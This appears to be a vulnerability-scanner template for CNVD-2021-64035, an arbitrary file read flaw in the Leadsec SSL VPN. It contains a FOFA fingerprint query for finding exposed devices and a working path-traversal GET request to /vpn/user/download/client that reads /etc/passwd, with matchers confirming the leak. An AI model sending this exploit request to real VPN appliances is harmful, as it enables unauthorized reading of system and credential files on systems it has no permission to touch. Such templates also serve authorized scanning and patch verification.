## id: CNVD-2021-64035
## name: Leadsec VPN - Arbitrary File Read
## author: hack007x
## severity: high
## tags: cnvd,cnvd2024,lfi,leadsec,vpn,vuln
## description: There is an information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., and attackers can use the vulnerability to obtain sensitive information.
## reference: https://avd.aliyun.com/detail?id=AVD-2021-888761
## reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035
## fofa-query: icon_hash="-15980305"
## verification: true

GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/
#@ matcher: body contains "appframe"
#@ matcher: status_code == 200





# @VEIL-STAMP: 257307a154d6923effe250d2cf7638ad2a6470dbba3c102a1e92aaf52e1b5156
